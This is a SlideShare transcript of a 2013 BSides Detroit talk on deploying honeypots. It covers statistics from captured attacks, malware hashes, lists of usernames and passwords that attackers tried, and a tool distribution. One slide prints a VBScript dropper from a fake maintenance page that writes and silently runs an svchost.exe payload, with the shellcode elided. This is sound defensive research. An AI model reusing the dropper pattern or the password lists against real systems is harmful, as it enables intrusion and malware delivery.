Bsides detroit 2013   honeypots
Upcoming SlideShare
Loading in...5
×
 

Bsides detroit 2013 honeypots

on

  • 895 views

 

Statistics

Views

Total Views
895
Views on SlideShare
893
Embed Views
2

Actions

Likes
0
Downloads
8
Comments
0

1 Embed 2

http://www.twylah.com 2

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • RECALCULATE!! Somehow my Excel sorting and calculating may be off a bit.

Bsides detroit 2013   honeypots Bsides detroit 2013 honeypots Presentation Transcript

  • Be vewy, vewy quiet….let’s watch some hackers..
  • Interactive portion introWhoamiWhat is a Honeypot?Different HoneypotsWhy Honeypots?Things I discoveredStratagemInteractive portion end results
  • Interactive portionSSID – FBI MobileIP address – 192.168.2.5User ID – bsidesThe password is…detroit (told you it was easy)
  • FatherHusband
  • GeekAntagonist of the shiny things
  • ShadowServer.org volunteerSecurity analystWhoami
  • A Honeypot is an informationsystem resource whose value lies inunauthorized or illicit use of thatresource. (May 2003)
  • Why Honeypots?
  • Why Honeypots?
  • Low interactionServer HoneypotsHoneyD
  • Low interactionServer HoneypotsConpot
  • Different HoneypotsClientside Honeypots
  • Windows XP SP 0 Windows Vista SP 0Client HoneypotsHigh InteractionDifferent Honeypots
  • Initial Research
  • A word of advice on using an EC2instance.
  • GeoIP locationDionaea - Ireland
  • Dionaea statsStarted  3/7/2013Stopped 3/9/2013Started  3/12/2013Stopped  3/14/2013Graphs are courtesy of DionaeaFRtool
  • Dionaea stats• Don’t forget to add your API key from VirusTotal to yourconfig file!!• If you don’t add the API key, then the pretty visualization tool can’t doit’s job and you have to do manually!!!
  • 1441097156171414998Dionaea statsTop 10 IP addresses
  • Wireshark AnalysisAttack Attempts
  • Malware CapturesMD5 Virus TotalDetectionRatioCommon name Source IP Address/WhoIs78c9042bbcefd65beaa0d40386da9f8944 / 46 Microsoft -Worm:Win32/Conficker.C• 209.190.25.37• XLHost – VPS provider• http://www.xlhost.com/7acba0d01e49618e25744d9a08e6900c45 / 46 Microsoft -Worm:Win32/Conficker.B69.28.137.10LimeLight Networks - a DigitalPresence Management companyhttp://www.limelight.com/90c081de8a30794339d96d64b86ae19442 / 43 Kaspersky -Backdoor.Win32.Rbot.aftu69.38.10.83WindStream Communications –Voice and data providerhttp://NuVox.netbcaef2729405ae54d62cb5ed097efa1243 / 44 Kaspersky -Backdoor.Win32.Rbot.bqj69.9.236.128Midwest Communications –Comcast/WideOpenWest parallelhttp://midco.net/
  • GeoIP locationDionaea - recent
  • Dionaea •Detection
  • Dionaea •Detection
  • Dionaea •Detection
  • KippoStarted  2/27/2013Stopped  3/1/2013IP addresses• 14 unique IP addresses• Maximum password attempts – 1342• Successful logins – 7• Replay scripts – 1•Files uploaded - 1
  • 1342119045416316315628 2216541 1Kippo stats2/27 to 3/1Attackers IP addresses/connection attempts
  • GeoIP locationKippo – recent
  • Kippo statsrootbinoracletestnagiosmartintoorftpuseruserpostgresinfowebmasterapachebackupguestr00tpublicgreendemositejeffandyi-heartuser0content18566717 10 9 6 6 6 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 3Top 25 User names2/27 – 3/1Times tried
  • Kippo stats27169 9 987 7 7 7 7 7 7 7 7 7 76 6 6Top 25 Passwords2/27 to 3/1Tries
  • Kippo statsAccounts that used 123456 aspasswordUser ID Triesroot 7ftpuser 3oracle 3andy 2info 2jeff 2site 2test 2webmaster 2areyes 1brian 1“7 successful logons? But your chart says 27 used the password of123456?! WTF?”
  • Kippo statsroot ├╢├Ä├ä┬Ñ├╛.├▓├ä┬┐├é┬Ñ root !Q@W#E$root !@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs root !Q@W#E$Rroot $hack4m3baby#b1gbroth3r$ root !Q@W#E$R%root 654321 root !Q@W#E$R%Troot Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD root !Q@W#E$R%T^root @!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!& root !Q@W#E$R%T^Yroot diffie-hellman-group-exchange-sha11 root !Q@W#E$R%T^Y&root 123 root !Q@W#E$R%T^Y&Uroot 1234 root !Q@W#E$R%T^Y&U*root 12345 root !Q@W#E$R%T^Y&U*Iroot 1234567 root !Q@W#E$R%T^Y&U*I(root 12345678 root !Q@W#E$R%T^Y&U*I(Oroot 123456789 root !Q@W#E$R%T^Y&U*I(O)root deathfromromaniansecurityteamneversleepba root !Q@W#E$R%T^Y&U*I(O)Proot rooooooooooooooooooooooooooooooooot root !Q@W#E$R%T^Y&U*I(O)P_Interesting passwords
  • Kippo statsFile downloadedpsyBNC 2.3.2------------This program is useful for people who cannot be on irc all the time.Its used to keep a connection to irc and your irc client connected, oralso allows to act as a normal bouncer by disconnecting from the ircserver when the client disconnects.
  • KippoStarted  5/31/2013Stopped  6/1/2013IP addresses• Unique IP addresses - 20• Maximum password attempts – 1098• Successful logins – 16• Replay scripts – 4•Files uploaded - 1
  • 670398273908864622825135 5 42211111Kippo stats5/31 to 6/1Attackers IP addresses/connection attempts
  • 221210 109 9 9 98 87 7 7 76 6 6 6 6 6 6 6 65 5Top 25 passwords5/31 to 6/1AttemptsKippo stats
  • 118417 15 11 8 8 7 6 6 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4Top 25 user names5/31 to 6/1Login attemptsKippo stats
  • Kippo statsReplay script – 20130603-104907-9177.logJust trying to run Perl
  • Kippo statsReplay script – 20130530-134418-3935.logUpload of shellbot.pl
  • Kippo statsFile downloaded#!/usr/bin/perl## ShellBOT by: devil__Discovered: June 3, 2005Updated: April 30, 2010 3:46:09 AMType: TrojanSystems Affected:Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, WindowsNT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XPBackdoor.Shellbot is a detection name used by Symantec to identify malicioussoftware programs that share the primary functionality of enabling a remoteattacker to have access to or send commands to a compromised computer.As the name suggests, these threats are used to provide a covert channelthrough which a remote attacker can access and control a computer. TheTrojans vary in sophistication, ranging from those that only allow for limitedfunctions to be performed to those that allow almost any action to be carriedout, thus allowing the remote attacker to almost completely take over controlof a computer.Backdoor.ShellbotRisk Level 1: Very Low
  • Kippo statsReplay script – 20130602-105723-5678.logUpload a tar.gz and trips a Python reply script
  • KippoDetectionCTF replay scripts
  • Kippo• Config file changes• Custom reply filesLessons learned
  • HoneyD
  • AmunStarted  5/29Stopped  5/30IP addresses• Unique IP addresses - 3• Files uploaded - 2
  • AmunAzenv.php (uploaded twice)• ProxyJudge scriptFiles uploaded
  • Thug• Honeyclient• Mimics client behavior• Browser• Plug-ins for 3rd party apps
  • MwcrawlerPE32 files--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 445Infected files: 44Data scanned: 510.42 MBData read: 353.98 MB (ratio 1.44:1)Time: 147.925 sec (2 m 27 s)Data--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 4Infected files: 1Data scanned: 1.04 MBData read: 0.41 MB (ratio 2.57:1)Time: 7.612 sec (0 m 7 s)
  • <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>UntitledDocument</title> </head><body>Mwcrawler<p align="center"><h1>Were sorry,</h1><h2>The site is temporarlyunavailable. Please check in next few days</h2></p></body></html><SCRIPTLanguage=VBScript><!--DropFileName = "svchost.exe“ WriteData =<Lots of shellcode>Set FSO = CreateObject("Scripting.FileSystemObject")DropPath =FSO.GetSpecialFolder(2) & "" & DropFileNameIf FSO.FileExists(DropPath)=FalseThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData)Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSetWSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>
  • How you can your netbook useful and funagain!
  •  Project page Goals◦ Documentation Tools◦ Honeypots◦ Network◦ Malware◦ Forensics◦ ToolsStratagemhttp://sourceforge.net/projects/stratagem/
  •  Honeypots◦ Dionaea◦ Kippo◦ Glastopf◦ HoneyD◦ Amun◦ Labrea◦ Tinyhoneypot◦ Thug◦ ConpotStratagem
  •  Network◦ Scapy◦ proxychains◦ Ngrep◦ Network Miner◦ Amun◦ Xplico◦ Capanalysis◦ Network Malware◦ Mwcrawler◦ Yara◦ ClamAVStratagem Forensics◦ Volatility Tools◦ Tor◦ i2p◦ Conky◦ Guake◦ Terminator
  • StratagemCapanalysis
  • StratagemCapanalysis
  • Next?
  • Resources• A host at $IP ($location)tried to log into my honeypots fake TerminalServices server• GET-based RFI attack from $IP ($location)• A host at $IP ($location)tried to log into my honeypots fake MSSQLServerhttp://inguardians.com/
  • Resources
  • Resources
  • http://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots/at_download/fullReport
  • Honeydrive
  • Keith Dixon@Tazdrumm3r#misec – Tazdrumm3rtazdrummer@gmail.comhttp://tazdrumm3r.wordpress.com